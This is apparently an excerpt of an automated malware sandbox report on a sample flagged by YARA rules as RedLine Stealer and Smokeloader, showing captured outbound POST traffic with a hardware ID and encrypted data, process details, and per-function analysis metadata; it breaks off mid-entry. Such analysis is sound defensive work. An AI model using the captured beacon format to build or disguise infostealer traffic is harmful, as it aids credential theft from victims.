2024-04-20 19:08:05 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 33 41 35 46 39 41 37 42 31 42 33 45 39 35 44 32 44 42 41 30 33 43 38 36 33 44 35 41 33 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E53A5F9A7B1B3E95D2DBA03C863D5A3F--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
2024-04-20 19:08:05 UTC	15331	OUT	Data Raw: 6f 83 67 31 0f bf b1 f3 28 df 6c c4 e1 6f b0 38 e3 f2 ff 19 01 e4 21 15 78 e4 b7 21 b8 1f c4 19 52 73 fd 00 33 97 0f 9c 86 03 22 43 70 dc a3 b2 b5 0e 7e 33 fb 31 1b 8a 21 2b c5 bc 28 5f fa ec 5a ca ef bc a9 96 11 08 da cb b7 e7 ac f5 81 d6 b6 4b de cf e3 bc 9e 57 8b 78 7a e0 08 6d e2 cd d1 1a 0d 5c 8e 7b 4d b2 5a fe e5 1f f8 81 30 49 74 eb 7d 0a 73 91 3d f3 e5 af 6d ed 58 4a 79 9c 82 79 de 37 dc 19 cd f4 46 1f 65 d0 f9 84 1e f8 5e b9 56 49 24 8c 6d e6 bc bb 34 68 d5 b4 93 df 83 a6 9c 0c 31 49 59 be da be f8 b7 18 8e 48 50 bd 89 58 98 90 b8 ad 19 3d 6a 2a 97 d5 1f 86 c8 9b 5c be 0e b6 39 df 2d ed bf ca 57 f7 f1 e7 80 a4 a5 11 e6 c4 69 e7 5d 4f 52 51 ff a1 d8 ba 0a a5 6b 2d d4 0c 2a c5 0d fd 46 28 1f 93 e4 73 26 f1 99 d9 69 ad ab 2b 90 53 3b 92 56 85 d7 22 Data Ascii: og1(lo8!x!Rs3"Cp~31!+(_ZKWxzm\{MZ0It}s=mXJyy7Fe^VI$m4h1IYHPX=j\9-Wi]ORQk-F(s&i+S;V"
2024-04-20 19:08:05 UTC	15331	OUT	Data Raw: 2b bd fe ab ff f5 b7 36 55 ee 11 35 35 85 92 60 a8 38 c4 14 62 cc e6 e2 c1 b6 1d ff 6a b1 d4 ba 08 c4 20 fd 77 e4 fa fc 4b 90 34 f3 df 21 d6 b9 d9 1a de 80 46 42 02 88 53 e4 ff 6b d0 b4 54 7f 9f a8 09 44 c0 61 0c ef e4 9e dd 7d 40 7a 3f 4d 15 81 e3 eb d7 f7 c9 36 ca 24 43 d5 ab 3b eb fa e5 2a a5 c0 62 e3 0d c8 57 f4 59 fa 71 35 d1 f6 8f e8 2b d9 f7 79 7b fe 02 8a 60 5c 3d e1 e7 f1 3f 6d 05 91 75 c8 81 16 6f fd 41 90 82 cb 8c f1 e9 51 88 16 8e 0e 80 8f 2d a8 14 71 e4 d7 75 35 3c 71 57 0d 98 84 dd 84 07 9c 20 22 f8 30 15 f1 9a 54 a0 e5 91 bb b7 41 67 4b fe 14 a9 78 be 76 0d 5f 6a 92 de 93 8a 18 29 21 73 99 b0 12 b0 77 80 45 4c dc 47 f2 e6 14 30 23 90 40 f6 ea f1 64 7e fd 46 ba 04 34 a1 5d 4b 6e 50 af a3 c4 af 22 bd 6f 25 04 13 2f 29 37 c1 4b 25 30 ef ac 7a Data Ascii: +6U55`8bj wK4!FBSkTDa}@z?M6$C;*bWYq5+y{`\=?muoAQ-qu5<qW "0TAgKxv_j)!swELG0#@d~F4]KnP"o%/)7K%0z
2024-04-20 19:08:05 UTC	15331	OUT	Data Raw: 93 6f e4 a6 01 ba 1a 91 4a 43 93 f9 51 bc 4a c0 03 8b 5d 3f a6 61 a9 82 77 ca 31 c1 82 a7 50 38 e2 00 d7 f0 e0 20 ce a3 44 e5 c5 2c fb a1 c9 47 1e d8 79 f2 ed 9b d7 7f e8 ba 59 ce 0f a1 47 3a 2f ce 01 e2 15 88 a8 30 94 8f 02 ae 6d 05 4f 9e c0 a5 a0 5e ff bf 53 6b 6d 2e 58 ab b7 ef d7 1b b4 ed c2 f5 eb b1 c8 3b b3 d5 be bc 66 c5 a7 dc aa bd 30 5e bc 2b f2 0b c5 59 a2 7e 96 5e 0d 01 89 38 c8 6d 72 ef ba 15 4f 80 3c 70 fe 3e 47 8a a8 c1 0d c5 95 a2 76 e5 ed d2 c3 7e 97 10 78 8d a6 77 0a 90 75 59 ea 2b 42 16 b5 a4 54 51 9c 08 78 23 aa 6e 09 32 1b 42 5c 01 61 a8 60 6e 58 4e 6c a4 5a eb 19 43 5f 48 fd 9f 88 17 87 48 2d 00 b3 88 66 c7 e9 a1 76 82 83 8b 3f dd d3 d1 eb 07 f6 ef de 88 fb 9d 50 43 e6 e7 5c 22 14 34 2d 65 fb 72 3c 9c 74 b1 84 4d 01 a5 86 78 9c 90 d5 Data Ascii: oJCQJ]?aw1P8 D,GyYG:/0mO^Skm.X;f0^+Y~^8mrO<p>Gv~xwuY+BTQx#n2B\a`nXNlZC_HH-fv?PC\"4-er<tMx
2024-04-20 19:08:05 UTC	15331	OUT	Data Raw: 60 22 be 79 44 08 65 5c c1 01 1c 02 cf 5e 09 cc ea 73 2b 02 81 d0 46 68 21 c3 1f 06 f5 43 23 23 03 e1 30 bf 75 8d 5e 7e 86 45 53 63 20 dd 9c f6 fb 04 d9 f4 e8 f1 f0 8c 08 ed 0a ae 8a 37 42 61 f5 ad 92 35 d9 2a e0 cc a4 3c 44 74 e3 5b 1e 40 e2 11 81 d2 b7 7c 4d fc 35 0c db 22 35 d7 2a 7d 6e 92 26 9a 0f 48 0a 4f 38 19 eb 73 a7 30 67 26 2f ee 5f cf 1d 52 c7 0c 07 3e 1a 1c 0e 3e b6 a0 dc 5d c4 68 d5 16 b3 d3 96 6a 5e 08 66 5c 3b 4e 16 5b 7f ad 69 3b 2c df ba 28 69 5f 1f a6 21 da 56 ce 09 e3 a6 08 0a 8c 04 61 40 30 06 c6 d8 06 fd bb 04 e8 23 0b 46 62 c0 36 9a 56 75 ae d8 29 06 13 8e 48 b7 08 d1 f7 b2 6b a6 7e 12 1a 97 2a 78 9d f3 36 1e 6d 7f 5e 80 b9 2a 7c d0 2e 54 d5 6f cb 28 d6 31 17 ef ff ad a2 f8 ff be 20 38 1b 09 8f 04 70 89 8a 8c 6d 08 3e a6 ca 38 db 1f Data Ascii: `"yDe\^s+Fh!C##0u^~ESc 7Ba5<Dt[@\|M5"5}n&HO8s0g&/_R>>]hj^f\;N[i;,(i_!Va@0#Fb6Vu)Hk~x6m^\|.To(1 8pm>8
2024-04-20 19:08:05 UTC	15331	OUT	Data Raw: 04 cf 25 2c 85 ad 75 81 6e 0e 21 e1 19 c9 8f af c4 fb 22 a9 06 08 ac 91 8a 5f b7 0c 99 5f 5d d6 2d 18 43 4a 20 42 b5 9f 4f 80 18 ee e9 82 4c d2 79 18 f9 7c 17 0e 76 79 54 0f 98 a9 f8 c8 f2 76 93 83 a4 73 80 fd 7e b6 38 6b 09 a4 b6 51 2a d6 02 67 c1 69 30 e5 ae 28 06 34 af 98 52 77 c0 c6 a0 56 66 e5 c0 03 e5 bb 9b 03 ba 18 22 aa 42 4d c6 3d af 17 61 b2 29 63 ac 5b 65 67 81 fc 1f 14 30 27 6d 5a d3 46 0a da 77 1d e1 41 9b 83 12 2a 21 da 84 a1 39 0e 18 c6 c3 2d 48 60 f9 08 ee 12 05 bb cb 96 85 e9 ed c6 bd e2 a0 6c f3 f6 de 00 14 d0 60 3f d1 44 54 16 6a 15 11 a2 e7 74 4a 32 a0 be 83 e3 c5 aa e0 34 c3 fd c3 c6 fa 61 c7 c1 8d a6 0f 29 87 c7 d9 8f 2a 53 54 94 a9 59 06 7f 14 fa 8e 0e 85 f5 88 b6 1e 48 af 0f a3 50 eb 70 99 b6 3f a6 b4 da a6 58 36 bc 7b 70 dd 56 94 Data Ascii: %,un!"__]-CJ BOLy\|vyTvs~8kQgi0(4RwVf"BM=a)c[eg0'mZFwA!9-H`l`?DTjtJ24a)*STYHPp?X6{pV
2024-04-20 19:08:05 UTC	15331	OUT	Data Raw: 7a d3 62 8b 2c fc 68 c2 05 a6 b4 61 9b 22 b8 83 92 e0 d0 dc 43 40 ba 39 35 6d f7 f4 ad cb 75 c7 15 65 ca 1b 75 35 40 37 4f 10 7e e7 31 7a 1a 4d 7f bb 31 6a 99 db df 3b c6 ff dd 16 fa a2 4e b8 ce 19 22 33 b2 02 f8 ef 99 1b f6 23 49 8b fc 7c 1f 61 fa bc 75 f8 9e 82 21 ee 5f 38 de 71 5d c0 8e 51 46 fc 84 f8 54 af 20 db 16 b0 bf cb 12 81 46 47 ee 1e 12 3f e3 30 57 9a d5 a5 86 aa a1 b4 40 7d f2 e0 d0 47 5c d2 41 2f 43 ed 1e c5 3e c7 b2 1d a1 67 64 49 7d 13 b8 f4 3a dd ce af 9c a1 f2 83 91 48 cb 31 4c d5 03 d2 73 d6 4f ab 2b 0d a4 69 5c fe 76 8d e1 11 24 93 44 61 85 7b 20 b4 9b a8 10 8a 88 02 27 06 c5 6e dd b5 18 3f 2a 72 48 fc e8 ea b3 f9 86 50 05 92 57 93 76 89 09 85 17 1a ba 7c f7 ec 67 5f c6 cc 26 6f 2d 41 61 14 2e 83 fc c3 e4 0c 67 f7 dd 60 eb e6 84 d6 42 Data Ascii: zb,ha"C@95mueu5@7O~1zM1j;N"3#I\|au!_8q]QFT FG?0W@}G\A/C>gdI}:H1LsO+i\v$Da{ 'n?*rHPWv\|g_&o-Aa.g`B
2024-04-20 19:08:05 UTC	15331	OUT	Data Raw: 5e eb fa c8 6c 27 83 28 00 ca 4b c7 cb cb 0d bc e2 00 3e 78 41 bb 3e 5c da d1 8f 33 95 71 19 10 fa fd 82 d3 dd 8c 3f eb b6 d7 b5 1b 15 af 67 a8 70 65 ce 91 f4 b7 ec 2d 17 b5 ae d2 b8 c1 1f 82 45 b7 5a b9 7c e7 d8 da 31 73 48 4a 66 a5 ca a6 3d 3b 7d d2 d6 fb 2a d0 a7 a5 1f cd 68 0d cd a7 a9 73 13 82 77 a5 4f d9 c0 71 f0 df 94 fe 6f 3d 83 37 0d 01 a1 00 ea c1 4b 1a db 70 84 83 9d bf ad 8d 7f a0 67 07 6d bc 2e 08 da 1a 3b c9 a9 62 1e dc 41 3e 96 df c5 e6 f4 1a 0b c4 28 65 0e be 97 03 5a 47 68 d7 3f a7 e5 2a b6 dc 0e d0 7e 1c fe f9 8e f1 2d 2d 30 5d 12 d5 80 a8 f4 3e 71 24 08 13 65 2d 00 6e a1 d0 bc 4b a7 9c 09 93 a2 c3 ae 52 32 bb ea f2 bd ba a5 fe 26 79 4a 8d 09 9a 94 61 20 e1 7a 03 b0 63 dc 9b fa 1d 20 4f 38 c2 5e 14 50 f3 e5 de b5 ae 2a 7b 2b c7 eb b6 62 Data Ascii: ^l'(K>xA>\3q?gpe-EZ\|1sHJf=;}hswOqo=7Kpgm.;bA>(eZGh?~--0]>q$e-nKR2&yJa zc O8^P*{+b
2024-04-20 19:08:05 UTC	15331	OUT	Data Raw: aa 97 c5 1d 36 84 eb 5b 88 7b 0e 72 c7 7c 41 bd 3a a3 6f 21 66 3d 0c a6 c1 a1 17 16 c3 55 fa e0 c3 b2 2d 13 54 2a 76 d6 9f 86 0a c3 41 92 a8 f3 ab 95 3a 47 c2 64 b6 46 03 cb 06 b8 35 ba 23 89 84 8e 36 c4 a5 de 42 3f be 8b 42 20 a9 cd a4 f1 f6 ba b1 53 53 60 aa cc 9e 62 94 d9 3d 0b e1 0d 89 d5 bd d2 ef 0a 88 5e a2 c2 5a 56 7d 61 51 61 93 b8 77 e6 6d 98 23 6e 5a 57 30 e7 a1 d8 c5 2b 2e 11 c6 bc 2a fd 6e 96 5e a6 a3 b9 04 7f 6e 3f 8c f0 98 4e 8e 67 74 d7 6f d6 ee 9d e0 39 76 c5 54 18 15 4a 5d 9f 19 a2 ef 86 95 66 79 75 4a b1 65 e9 d3 6e da 19 00 47 85 99 ad 79 c3 d7 f5 26 b2 03 e2 37 ad 74 db b3 19 52 9c ab 06 d4 6b 6d 84 ae 1e b6 c7 51 ac ae c2 65 55 3d 70 49 bb 30 6d 30 59 75 9c a9 3f be 7e 26 2a 34 40 64 40 28 59 e9 c7 cc 49 13 d3 9a 4e 83 95 b0 ff 36 35 Data Ascii: 6[{r\|A:o!f=U-TvA:GdF5#6B?B SS`b=^ZV}aQawm#nZW0+.n^n?Ngto9vTJ]fyuJenGy&7tRkmQeU=pI0m0Yu?~&*4@d@(YIN65
2024-04-20 19:08:05 UTC	15331	OUT	Data Raw: f2 63 bb 65 7f b2 c9 d5 ad 1f cf 84 35 c0 c9 75 3b 75 fe cf 00 c7 d5 4a 58 22 ae 90 17 e8 ac dd f6 ba 75 d7 f9 28 f5 07 12 ed 57 7b eb 5d 92 1c f8 2d 77 4a 17 f7 bc 4e 1c c2 71 55 02 aa a4 6f 7e 54 49 78 8b 21 da d6 a0 b0 83 ca bb d1 c7 f6 1a c1 8e 90 6c 15 38 5c 7f 3d 2d cc 4d a5 71 b7 09 ef e9 d1 77 9d f8 bc a8 a1 98 f9 ab 66 69 1d e2 b7 88 42 9f 1d a8 5d c9 a1 03 77 e4 36 ec af ad 7d 14 c1 73 5f d0 45 69 18 c3 43 82 4a 8a 09 96 d9 82 af 8f 6a 7d 8a 7e b3 c9 3e 52 ec 01 65 3b 79 a9 4b 7b 51 29 2e d8 b9 f1 62 e1 bb ce cd 91 bc 2c 0c c7 cd 4c 7a 1a 03 e1 e6 5c 9b b1 e3 6b 6f 6b a2 8f 60 f5 5b b9 9d 4e 06 8a 6b b5 71 a4 2a 3e 7c 62 b0 86 5e 9b d8 1c 8d 30 6c f2 37 8b e0 5d 5d 91 8f 89 ec 91 cf 0b 6b 62 f9 97 67 99 1a a3 01 79 9d 6a ce 27 64 32 d8 6b fb 6d Data Ascii: ce5u;uJX"u(W{]-wJNqUo~TIx!l8\=-MqwfiB]w6}s_EiCJj}~>Re;yK{Q).b,Lz\kok`[Nkq*>\|b^0l7]]kbgyj'd2km
2024-04-20 19:08:07 UTC	810	IN	HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 19:08:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2d3edfcgsbfhp4gtlbk0db5tns; expires=Wed, 14-Aug-2024 12:54:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35kdLk8HI5E56F7ScKtrctk4PnCbf1iDKs98fsorJ2kM039mtH%2BykOyquWj%2FgOfeAjxWruofX%2F02bDWMQE%2FhaO6XtqP7SEyGA0RHS1dF9XWHgRNb2XmXSpRyUwBWNBlU7EJ7JN5CXg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87776bc60d446743-ATL alt-svc: h3=":443"; ma=86400

Target ID:	0
Start time:	21:07:57
Start date:	20/04/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	406'528 bytes
MD5 hash:	B09198B2D83AF5E3D6C58D710D4192E0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1890444980.0000000001A6F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:08:06
Start date:	20/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 488
Imagebase:	0x560000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:08:07
Start date:	20/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 1552
Imagebase:	0x560000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	8%
Signature Coverage:	29.2%
Total number of Nodes:	349
Total number of Limit Nodes:	19

Executed Functions

Function 004156B6 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 488
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004156F8
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 0041572E
RtlExpandEnvironmentStrings.NTDLL(00000000,2F8B2D9A,?,00000000,00000000,?), ref: 00415A58
RtlExpandEnvironmentStrings.NTDLL(00000000,2F8B2D9A,?,00000000,?,?), ref: 00415A9D

Strings

VSB, xrefs: 004158BE

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: VSB
API String ID: 237503144-2654250299
Opcode ID: 53cef7e92d736fe6a7591e0a6cb12257e52cdfb14691c055fed94390b50e5863
Instruction ID: 561acfdcea67f0ed6ea61f084dffec9e4f3ed68c02ddb911ce32c0222a0ae114
Opcode Fuzzy Hash: 53cef7e92d736fe6a7591e0a6cb12257e52cdfb14691c055fed94390b50e5863
Instruction Fuzzy Hash: 01F17DB5A00B01AFD724DF29C8427A3BBF5FF49324F14461DE8AA8B790E335A4518BD5

Uniqueness

Uniqueness Score: -1.00%

Function 004046D0 Relevance: 5.5, Strings: 4, Instructions: 506
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

), xrefs: 0040475E
IDAT, xrefs: 00404B87
IEND, xrefs: 00404BFF
IHDR, xrefs: 00404B16

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: )$IDAT$IEND$IHDR
API String ID: 0-3181356877
Opcode ID: c576af9bbb2859a3af7d0e30d66e3881eecd9865837ce368412a9390484856bc
Instruction ID: 8102909a56e56f31e14bd42bc049a778ecbfeaf59adb2e6de5403f8909f3a5ca
Opcode Fuzzy Hash: c576af9bbb2859a3af7d0e30d66e3881eecd9865837ce368412a9390484856bc
Instruction Fuzzy Hash: C012FDB1A083449FD714CF28D85076B7BE1EF85304F05857EEA85AB382D778D909CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC60 Relevance: 4.1, Strings: 3, Instructions: 328COMMON

Download Yara Rule

Strings

7q9w, xrefs: 0041CC7E
tu, xrefs: 0041CC86
m!s, xrefs: 0041CCC6

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: m!s$7q9w$tu
API String ID: 0-1328737773
Opcode ID: 9a80d6aeca7c9c941bb5b843a82725633c88e976ea84821064f12ec0d42a7703
Instruction ID: a0c0b6b935059c8c526aef0dde426ea912ec2d3602511b1274e97aa73ba39016
Opcode Fuzzy Hash: 9a80d6aeca7c9c941bb5b843a82725633c88e976ea84821064f12ec0d42a7703
Instruction Fuzzy Hash: 1D91F1B16443018BDB14DF14CC927BBB7A1FF91718F19492EE8829B391E378D941C79A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DB22 Relevance: 3.6, APIs: 2, Instructions: 615COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041DF06

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 97cb1da8bad9422afa365411f7b79ffaf2cd696d95e47ce5748a6747c636db49
Instruction ID: 262629fdbb3efc19342746e0a643e000866adf4d73472e6c2c89fe251207d53e
Opcode Fuzzy Hash: 97cb1da8bad9422afa365411f7b79ffaf2cd696d95e47ce5748a6747c636db49
Instruction Fuzzy Hash: 862278B46083418FE314CF15C89076BB7E6FFCA309F14892DE8959B291D778D945CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 01A7059E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 01A705C6
Module32First.KERNEL32(00000000,00000224), ref: 01A705E6

Memory Dump Source

Source File: 00000000.00000002.1890444980.0000000001A6F000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A6F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6f000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 9db919015a0cd66e8ba650419c788b5b7f9f9835862fd0a3d5a929338e7bfd55
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 91F096322007116FE7203BF99D8CB6E76E8AF4A624F104529F656E10C0DB70EA454A61

Uniqueness

Uniqueness Score: -1.00%

Function 0041AFE0 Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

!, xrefs: 0041B013
|)t+, xrefs: 0041AFFF

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID: !$|)t+
API String ID: 0-1543151180
Opcode ID: c3e86dcb4a145c767efabe64718c64748602917cefe9c5578b12583e16bef2f1
Instruction ID: 0549958bf72732722078fd682deb9016a6df138242a2d297af9ac57ce41d61db
Opcode Fuzzy Hash: c3e86dcb4a145c767efabe64718c64748602917cefe9c5578b12583e16bef2f1
Instruction Fuzzy Hash: D341BB716183109BC718CF14C8A076BB7B0FF8A328F049A1DE8E19B380E378D941C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004162D6 Relevance: 1.7, APIs: 1, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ec7d6abf085d8bd83f76fa4baf0a946e39f35204c992aad82303006fadc16a0
Instruction ID: 58d5ef61e29c700e7a5bf84aeee46845931b96e69ec54e1ba371a830b22f87e7
Opcode Fuzzy Hash: 7ec7d6abf085d8bd83f76fa4baf0a946e39f35204c992aad82303006fadc16a0
Instruction Fuzzy Hash: F371E0B1604B008FD724CF24D891753BBE2BF49314F198A6ED8AA8B792D778E845CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00435B8B Relevance: 1.5, APIs: 1, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000), ref: 00435C27

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 740ebc34b8d8c971d3edc87d0057dfa78f29b7d66a8bae47ee5e3db84938a7f1
Instruction ID: 1272006d1290d83cf13eff99d31ed8c686e055d99e4b0088207ea3cb61a97368
Opcode Fuzzy Hash: 740ebc34b8d8c971d3edc87d0057dfa78f29b7d66a8bae47ee5e3db84938a7f1
Instruction Fuzzy Hash: 141139705083019FD708CF54C46472BFBE1EBC5318F248A5DE8A91B291C379D959CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00435C40 Relevance: 1.5, APIs: 1, Instructions: 16libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043AB86,005C003F,00000006,?,?,00000018,8A858487,?,:RA), ref: 00435C6D

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
Instruction ID: 57f1bbd75be791b51c1c69d73521a326315edc5ecdbfadca72035e30f952b94d
Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
Instruction Fuzzy Hash: 64E09275508602AFEA05DF45C14050EF7E2BFC8718F55988DE88473604C6B4AD45DA42

Uniqueness

Uniqueness Score: -1.00%

Function 00420C42 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c05f572b40e1ee658a53a265a9c69a1e9a99d1188c26c8d681712ba5683871
Instruction ID: 0646c17248e0037d8b2e2a871ccc27ad5747d79b115fced78c7331720078151d
Opcode Fuzzy Hash: 54c05f572b40e1ee658a53a265a9c69a1e9a99d1188c26c8d681712ba5683871
Instruction Fuzzy Hash: D0D167B8610B018FD324CF25D890B27B7E1FB4A304F958A2DD5968BB61D779F846CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00421370 Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1889438196.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1889438196.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 29c4e0a7dd6a94e6411e4dc72a7eab72c58292086366d6b269dac0f35d3dad1b
Instruction ID: b691efaaebe1fd9e0190dd32e1fb97d0ad8f24f092331a3f0970b38f0ebcf96e
Opcode Fuzzy Hash: 29c4e0a7dd6a94e6411e4dc72a7eab72c58292086366d6b269dac0f35d3dad1b
